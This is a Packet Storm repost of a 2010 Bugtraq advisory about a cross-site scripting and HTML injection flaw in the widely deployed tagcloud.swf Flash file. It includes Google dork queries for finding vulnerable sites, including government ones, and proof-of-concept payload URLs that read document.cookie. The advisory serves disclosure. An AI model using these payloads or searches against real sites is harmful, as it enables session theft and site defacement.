what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

tagcloud.swf Cross Site Scripting

tagcloud.swf Cross Site Scripting
Posted Jan 11, 2010
Authored by MustLive

Approximately 34 million tagcloud.swf files on the Internet suffer from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | a08201662495412c103ae59c8fb8e98c443eed4b23c61bb8f3041cb0b3eaf03e

tagcloud.swf Cross Site Scripting

Change Mirror Download
Hello Bugtraq!

Yesterday I wrote the article XSS vulnerabilities in 34 millions flash files
(http://websecurity.com.ua/3842/), and here is English version of it.

In December in my article XSS vulnerabilities in 8 millions flash files
(http://websecurity.com.ua/3789/) I wrote, that there are up to 34000000
of flashes tagcloud.swf in Internet which are potentially vulnerable to XSS
attacks. Taking into account that people mostly didn't draw attention in
previous article to my mentioning about another 34 millions of vulnerable
flashes, then I decided to write another article about it.

File tagcloud.swf was developed by author of plugin WP-Cumulus for WordPress
(http://websecurity.com.ua/3665/) and it's delivered with this plugin for
WordPress, and also with other plugins, particularly Joomulus
(http://websecurity.com.ua/3801/) and JVClouds3D
(http://websecurity.com.ua/3839/) for Joomla and Blogumus
(http://websecurity.com.ua/3843/) for Blogger. Taking into account
prevalence of this flash file, I'll note that it's most widespread flash
file in Internet with XSS vulnerability.

-------------------------------------
Prevalence of the problem.
-------------------------------------

There are a lot of vulnerable tagcloud.swf files in Internet (according to
Google):

http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf

If at 18.12.2009 there were about 34000000 results, then now there are about
32500000 results. And these are only those flash files, which were indexed
by Google, and actually there can be much more of them.

So there are about 32,5 millions of sites with file tagcloud.swf which are
vulnerable to XSS and HTML Injection attacks.

Among them there are about 273000 gov-sites
(http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf+inurl:gov&filter=0)
which are vulnerable to XSS and HTML Injection attacks.

----------------------------------
Vulnerabilities in swf-file.
----------------------------------

File tagcloud.swf is vulnerable to XSS and HTML Injection attacks via
parameter tagcloud.

XSS:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS.

HTML Injection:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

HTML Injection attack can be conducted particularly on those flash files
which have protection (in flash files or via WAF) against javascript and
vbscript URI in parameter tagcloud.

----------------------------------------
Examples of vulnerable sites.
----------------------------------------

I gave examples of vulnerable sites with this swf-file in post XSS
vulnerabilities in tagcloud.swf at gov and gov.ua
(http://websecurity.com.ua/3835/).

So for flash developers it's better to attend to security of their flash
files. And for owners of sites with vulnerable flashes (particularly
tagcloud.swf) it's needed either to fix them by themselves, or to turn to
their developers.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close